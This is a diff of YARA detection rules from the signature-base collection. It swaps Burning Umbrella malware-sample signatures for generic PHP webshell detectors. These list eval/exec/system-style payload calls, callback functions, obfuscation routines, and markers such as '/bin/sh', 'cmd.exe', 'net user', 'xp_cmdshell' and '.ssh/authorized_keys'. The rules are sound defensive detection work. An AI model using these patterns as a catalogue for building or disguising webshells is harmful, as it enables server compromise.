-		hash1 = "fa380dac35e16da01242e456f760a0e75c2ce9b68ff18cfc7cfdd16b2f4dec56"
-		hash2 = "854b64155f9ceac806b49f3e352949cc292e5bc33f110d965cf81a93f78d2f07"
-		hash3 = "1e462d8968e8b6e8784d7ecd1d60249b41cf600975d2a894f15433a7fdf07a0f"
-		hash4 = "3cdc149e387ec4a64cce1191fc30b8588df4a2947d54127eae43955ce3d08a01"
-		hash5 = "a026b11e15d4a81a449d20baf7cbd7b8602adc2644aa4bea1e55ff1f422c60e3"
+		importance = 70
 
 	strings:
-		$s1 = "syshell" fullword wide
-		$s2 = "Normal.dotm" fullword ascii
-		$s3 = "Microsoft Office Word" fullword ascii
+		$obf1 = "chr(" wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$callback1 = /\bob_start[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback2 = /\barray_diff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback3 = /\barray_diff_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback4 = /\barray_filter[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback5 = /\barray_intersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback6 = /\barray_intersect_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback7 = /\barray_map[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback8 = /\barray_reduce[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback9 = /\barray_udiff_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback10 = /\barray_udiff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback11 = /\barray_udiff[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback12 = /\barray_uintersect_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback13 = /\barray_uintersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback14 = /\barray_uintersect[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback15 = /\barray_walk_recursive[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback16 = /\barray_walk[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback17 = /\bassert_options[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback18 = /\buasort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback19 = /\buksort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback20 = /\busort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback21 = /\bpreg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback22 = /\bspl_autoload_register[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback23 = /\biterator_apply[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback24 = /\bcall_user_func[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback25 = /\bcall_user_func_array[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback26 = /\bregister_shutdown_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback27 = /\bregister_tick_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback28 = /\bset_error_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback29 = /\bset_exception_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback30 = /\bsession_set_save_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback31 = /\bsqlite_create_aggregate[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback32 = /\bsqlite_create_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$callback33 = /\bmb_ereg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$m_callback1 = /\bfilter_var[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$m_callback2 = "FILTER_CALLBACK" fullword wide ascii
+		$cfp1 = /ob_start\(['\"]ob_gzhandler/ nocase wide ascii
+		$cfp2 = "IWPML_Backend_Action_Loader" ascii wide
+		$cfp3 = "<?phpclass WPML" ascii
+		$cfp4 = "      return implode('', "
+		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
+		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
+		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
+		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
+		$cobfs1 = "gzinflate" fullword nocase wide ascii
+		$cobfs2 = "gzuncompress" fullword nocase wide ascii
+		$cobfs3 = "gzdecode" fullword nocase wide ascii
+		$cobfs4 = "base64_decode" fullword nocase wide ascii
+		$cobfs5 = "pack" fullword nocase wide ascii
+		$cobfs6 = "undecode" fullword nocase wide ascii
+		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
+		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
+		$gen_bit_sus6 = "self.delete"
+		$gen_bit_sus9 = "\"cmd /c" nocase
+		$gen_bit_sus10 = "\"cmd\"" nocase
+		$gen_bit_sus11 = "\"cmd.exe" nocase
+		$gen_bit_sus12 = "%comspec%" wide ascii
+		$gen_bit_sus13 = "%COMSPEC%" wide ascii
+		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
+		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
+		$gen_bit_sus21 = "\"upload\"" wide ascii
+		$gen_bit_sus22 = "\"Upload\"" wide ascii
+		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
+		$gen_bit_sus24 = "fileupload" wide ascii
+		$gen_bit_sus25 = "file_upload" wide ascii
+		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
+		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
+		$gen_bit_sus30 = "serv-u" wide ascii
+		$gen_bit_sus31 = "Serv-u" wide ascii
+		$gen_bit_sus32 = "Army" fullword wide ascii
+		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
+		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
+		$gen_bit_sus35 = "crack" fullword wide ascii
+		$gen_bit_sus44 = "<pre>" wide ascii
+		$gen_bit_sus45 = "<PRE>" wide ascii
+		$gen_bit_sus46 = "shell_" wide ascii
+		$gen_bit_sus50 = "bypass" wide ascii
+		$gen_bit_sus52 = " ^ $" wide ascii
+		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
+		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
+		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
+		$gen_bit_sus57 = "dumper" wide ascii
+		$gen_bit_sus59 = "'cmd'" wide ascii
+		$gen_bit_sus60 = "\"execute\"" wide ascii
+		$gen_bit_sus61 = "/bin/sh" wide ascii
+		$gen_bit_sus62 = "Cyber" wide ascii
+		$gen_bit_sus63 = "portscan" fullword wide ascii
+		$gen_bit_sus66 = "whoami" fullword wide ascii
+		$gen_bit_sus67 = "$password='" fullword wide ascii
+		$gen_bit_sus68 = "$password=\"" fullword wide ascii
+		$gen_bit_sus69 = "$cmd" fullword wide ascii
+		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
+		$gen_bit_sus71 = "Hacking" fullword wide ascii
+		$gen_bit_sus72 = "hacking" fullword wide ascii
+		$gen_bit_sus73 = ".htpasswd" wide ascii
+		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
+		$gen_much_sus7 = "Web Shell" nocase
+		$gen_much_sus8 = "WebShell" nocase
+		$gen_much_sus3 = "hidded shell"
+		$gen_much_sus4 = "WScript.Shell.1" nocase
+		$gen_much_sus5 = "AspExec"
+		$gen_much_sus14 = "\\pcAnywhere\\" nocase
+		$gen_much_sus15 = "antivirus" nocase
+		$gen_much_sus16 = "McAfee" nocase
+		$gen_much_sus17 = "nishang"
+		$gen_much_sus18 = "\"unsafe" fullword wide ascii
+		$gen_much_sus19 = "'unsafe" fullword wide ascii
+		$gen_much_sus24 = "exploit" fullword wide ascii
+		$gen_much_sus25 = "Exploit" fullword wide ascii
+		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
+		$gen_much_sus30 = "Hacker" wide ascii
+		$gen_much_sus31 = "HACKED" fullword wide ascii
+		$gen_much_sus32 = "hacked" fullword wide ascii
+		$gen_much_sus33 = "hacker" wide ascii
+		$gen_much_sus34 = "grayhat" nocase wide ascii
+		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
+		$gen_much_sus36 = "Rootkit" wide ascii
+		$gen_much_sus37 = "rootkit" wide ascii
+		$gen_much_sus38 = "/*-/*-*/" wide ascii
+		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
+		$gen_much_sus40 = "\"e\"+\"v" wide ascii
+		$gen_much_sus41 = "a\"+\"l\"" wide ascii
+		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
+		$gen_much_sus43 = "q\"+\"u\"" wide ascii
+		$gen_much_sus44 = "\"u\"+\"e" wide ascii
+		$gen_much_sus45 = "/*//*/" wide ascii
+		$gen_much_sus46 = "(\"/*/\"" wide ascii
+		$gen_much_sus47 = "eval(eval(" wide ascii
+		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
+		$gen_much_sus49 = "Shell.Users" wide ascii
+		$gen_much_sus50 = "PasswordType=Regular" wide ascii
+		$gen_much_sus51 = "-Expire=0" wide ascii
+		$gen_much_sus60 = "_=$$_" wide ascii
+		$gen_much_sus61 = "_=$$_" wide ascii
+		$gen_much_sus62 = "++;$" wide ascii
+		$gen_much_sus63 = "++; $" wide ascii
+		$gen_much_sus64 = "_.=$_" wide ascii
+		$gen_much_sus70 = "-perm -04000" wide ascii
+		$gen_much_sus71 = "-perm -02000" wide ascii
+		$gen_much_sus72 = "grep -li password" wide ascii
+		$gen_much_sus73 = "-name config.inc.php" wide ascii
+		$gen_much_sus75 = "password crack" wide ascii
+		$gen_much_sus76 = "mysqlDll.dll" wide ascii
+		$gen_much_sus77 = "net user" wide ascii
+		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
+		$gen_much_sus81 = /strrev\(['"]/ wide ascii
+		$gen_much_sus82 = "PHPShell" fullword wide ascii
+		$gen_much_sus821 = "PHP Shell" fullword wide ascii
+		$gen_much_sus83 = "phpshell" fullword wide ascii
+		$gen_much_sus84 = "PHPshell" fullword wide ascii
+		$gen_much_sus87 = "deface" wide ascii
+		$gen_much_sus88 = "Deface" wide ascii
+		$gen_much_sus89 = "backdoor" wide ascii
+		$gen_much_sus90 = "r00t" fullword wide ascii
+		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
+		$gen_much_sus92 = "base64_decode(base64_decode(" fullword wide ascii
+		$gen_much_sus93 = "eval(\"/*" wide ascii
+		$gen_much_sus94 = "=$_COOKIE;" wide ascii
+		$gif = { 47 49 46 38 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		(( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( ( not any of ( $cfp* ) and ( any of ( $callback* ) or all of ( $m_callback* ) ) ) or ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) ) and ( any of ( $cobfs* ) ) and ( filesize < 1KB or ( filesize < 3KB and ( ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) or #obf1 > 10 ) ) )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_18 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Includer_Eval : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d08f4676-ff28-59be-9fd4-b5a824e577d9"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L286-L313"
+		description = "PHP webshell which eval()s another included file"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "995fcc34-f91e-5c9c-97b1-84eed1714d40"
+		date = "2021-01-13"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1851-L1900"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8ec1a1262874f636906186b569d231d6e3dd97ed6ef5cbddcbaf9f80cee301a0"
+		hash = "3a07e9188028efa32872ba5b6e5363920a6b2489"
+		hash = "ab771bb715710892b9513b1d075b4e2c0931afb6"
+		hash = "202dbcdc2896873631e1a0448098c820c82bcc8385a9f7579a0dc9702d76f580"
+		hash = "b51a6d208ec3a44a67cce16dcc1e93cdb06fe150acf16222815333ddf52d4db8"
+		logic_hash = "a7e9632c495e5d4cc883e2593c8ebe41cdf6a18b54bd6dfd3aec85352f19321c"
 		score = 75
-		quality = 85
+		quality = 46
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d8df60524deb6df4f9ddd802037a248f9fbdd532151bb00e647b233e845b1617"
-		hash2 = "c55cb6b42cfabf0edf1499d383817164d1b034895e597068e019c19d787ea313"
-		hash3 = "32144ba8370826e069e5f1b6745a3625d10f50a809f3f2a72c4c7644ed0cab03"
-		hash4 = "ae616003d85a12393783eaff9778aba20189e423c11c852e96c29efa6ecfce81"
-		hash5 = "95b6e427883f402db73234b84a84015ad7f3456801cb9bb19df4b11739ea646d"
-		hash6 = "1419ba36aae1daecc7a81a2dfb96631537365a5b34247533d59a70c1c9f58da2"
-		hash7 = "6a5a9b0ae10ce6a0d5e1f7d21d8ea87894d62d0cda00db005d8d0de17cae7743"
-		hash8 = "74e348068f8851fec1b3de54550fe09d07fb85b7481ca6b61404823b473885bb"
-		hash9 = "adb9c2fe930fae579ce87059b4b9e15c22b6498c42df01db9760f75d983b93b2"
-		hash0 = "23f28b5c4e94d0ad86341c0b9054f197c63389133fcd81dd5e0cf59f774ce54b"
+		importance = 70
 
 	strings:
-		$s1 = "c:\\tmp\\tran.exe" fullword ascii
+		$payload1 = "eval" fullword wide ascii
+		$payload2 = "assert" fullword wide ascii
+		$include1 = "$_FILE" wide ascii
+		$include2 = "include" wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "11675b4db0e7df7b29b1c1ef6f88e2e1" or pe.imphash ( ) == "364e1f68e2d412db34715709c68ba467" or pe.exports ( "deKernel" ) or 1 of them )
+		filesize < 200 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and 1 of ( $payload* ) and 1 of ( $include* )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_19 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Includer_Tiny : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8ab55e80-5d28-5a5f-a1cc-725ba6720e4b"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L315-L332"
+		description = "Suspicious: Might be PHP webshell includer, check the included file"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9bf96ddc-d984-57eb-9803-0b01890711b5"
+		date = "2021-04-17"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1902-L1947"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "218c16d1b67e3e80dc7fdaf67a869e92b39744cb336e70761ac960da36c00372"
+		hash = "0687585025f99596508783b891e26d6989eec2ba"
+		hash = "9e856f5cb7cb901b5003e57c528a6298341d04dc"
+		hash = "b3b0274cda28292813096a5a7a3f5f77378b8905205bda7bb7e1a679a7845004"
+		logic_hash = "e1efb6384009def30d845650fd0dd77319c3c7b4402cca074ca5c2a06372ab58"
 		score = 75
-		quality = 85
+		quality = 42
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "05e2912f2a593ba16a5a094d319d96715cbecf025bf88bb0293caaf6beb8bc20"
-		hash2 = "e7bbdb275773f43c8e0610ad75cfe48739e0a2414c948de66ce042016eae0b2e"
+		importance = 70
 
 	strings:
-		$s1 = "Cryption.dll" fullword ascii
-		$s2 = "tran.exe" fullword ascii
-		$s3 = "Kernel.dll" fullword ascii
-		$s4 = "Now ready to get the file %s!" fullword ascii
+		$php_include1 = /include\(\$_(GET|POST|REQUEST)\[/ nocase wide ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
+		filesize < 100 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $php_include* )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_20 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Dynamic : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1a39a76a-31e2-5d6e-82cb-ea38d503b6a9"
-		date = "2018-05-04"
-		modified = "2023-01-06"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L334-L355"
+		description = "PHP webshell using function name from variable, e.g. $a='ev'.'al'; $a($code)"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "58ad94bc-93c8-509c-9d3a-c9a26538d60c"
+		date = "2021-01-13"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1949-L2022"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e2739a89451a4eba0bae345203dd4c0e26f715bb079830e36c772861fdd0f4de"
-		score = 75
-		quality = 85
+		hash = "65dca1e652d09514e9c9b2e0004629d03ab3c3ef"
+		hash = "b8ab38dc75cec26ce3d3a91cb2951d7cdd004838"
+		hash = "c4765e81550b476976604d01c20e3dbd415366df"
+		hash = "2e11ba2d06ebe0aa818e38e24a8a83eebbaae8877c10b704af01bf2977701e73"
+		logic_hash = "c49434662defad4945639887f4a6537c44a5559f83646f378f848b4aa4ba3c3f"
+		score = 60
+		quality = -156
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5c12379cd7ab3cb03dac354d0e850769873d45bb486c266a893c0daa452aa03c"
-		hash2 = "172cd90fd9e31ba70e47f0cc76c07d53e512da4cbfd197772c179fe604b75369"
-		hash3 = "1ce88e98c8b37ea68466657485f2c01010a4d4a88587ba0ae814f37680a2e7a8"
+		importance = 70
 
 	strings:
-		$s1 = "Wordpad.Document.1\\shell\\open\\command\\" wide
-		$s2 = "%s\\shell\\Open\\command" fullword wide
-		$s3 = "expanding computer" fullword ascii
+		$pd_fp1 = "whoops_add_stack_frame" wide ascii
+		$pd_fp2 = "new $ec($code, $mode, $options, $userinfo);" wide ascii
+		$pd_fp3 = "($i)] = 600;" ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$dynamic1 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\$/ wide ascii
+		$dynamic2 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\("/ wide ascii
+		$dynamic3 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\('/ wide ascii
+		$dynamic4 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(str/ wide ascii
+		$dynamic5 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\)/ wide ascii
+		$dynamic6 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(@/ wide ascii
+		$dynamic7 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(base64_decode/ wide ascii
+		$dynamic8 = /\$\{[^}]{1,20}}(\[[^\]]{1,20}\])?\(\$\{/ wide ascii
+		$fp1 = { 3C 3F 70 68 70 0A 0A 24 61 28 24 62 20 3D 20 33 2C 20 24 63 29 3B }
+		$fp2 = { 3C 3F 70 68 70 0A 0A 24 61 28 24 62 20 3D 20 33 2C 20 2E 2E 2E 20 24 63 29 3B }
+		$fp3 = { 3C 3F 70 68 70 0A 0A 24 61 20 3D 20 6E 65 77 20 73 74 61 74 69 63 3A 3A 24 62 28 29 3B}
+		$fp4 = { 3C 3F 70 68 70 0A 0A 24 61 20 3D 20 6E 65 77 20 73 65 6C 66 3A 3A 24 62 28 29 3B }
+		$fp5 = { 3C 3F 70 68 70 0A 0A 24 61 20 3D 20 5C 22 7B 24 76 61 72 43 61 6C 6C 61 62 6C 65 28 29 7D 5C 22 3B }
+		$fp6 = "// TODO error about missing expression"
+		$fp7 = "// This is an invalid location for an attribute, "
+		$fp8 = "/* Auto-generated from php/php-langspec tests */"
+		$fp_dynamic1 = /"\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\$/ wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "bac338bfe2685483c201e15eae4352d5" or 2 of them )
+		filesize > 20 and filesize < 200 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $dynamic* ) ) and not any of ( $pd_fp* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_21 : FILE
+
+rule SIGNATURE_BASE_WEBSHELL_PHP_Dynamic_Big : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2193e4b6-b71c-5031-8e43-fdd7177ad05c"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L357-L376"
+		description = "PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a5caab93-7b94-59d7-bbca-f9863e81b9e5"
+		date = "2021-02-07"
+		modified = "2025-08-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L2024-L2345"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4fdb162575bd108bb35e5c8ed10f7cac7539a15349218222dbb82d8eae8ad4bb"
-		score = 75
-		quality = 85
+		hash = "6559bfc4be43a55c6bb2bd867b4c9b929713d3f7f6de8111a3c330f87a9b302c"
+		hash = "9e82c9c2fa64e26fd55aa18f74759454d89f968068d46b255bd4f41eb556112e"
+		hash = "6def5296f95e191a9c7f64f7d8ac5c529d4a4347ae484775965442162345dc93"
+		hash = "dadfdc4041caa37166db80838e572d091bb153815a306c8be0d66c9851b98c10"
+		hash = "0a4a292f6e08479c04e5c4fdc3857eee72efa5cd39db52e4a6e405bf039928bd"
+		hash = "4326d10059e97809fb1903eb96fd9152cc72c376913771f59fa674a3f110679e"
+		hash = "b49d0f942a38a33d2b655b1c32ac44f19ed844c2479bad6e540f69b807dd3022"
+		hash = "575edeb905b434a3b35732654eedd3afae81e7d99ca35848c509177aa9bf9eef"
+		hash = "ee34d62e136a04e2eaf84b8daa12c9f2233a366af83081a38c3c973ab5e2c40f"
+		logic_hash = "1a29df7465b475e74d0f21f1705405e9663699a6e3c7b7107988ee3e202c3a25"
+		score = 50
+		quality = -336
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
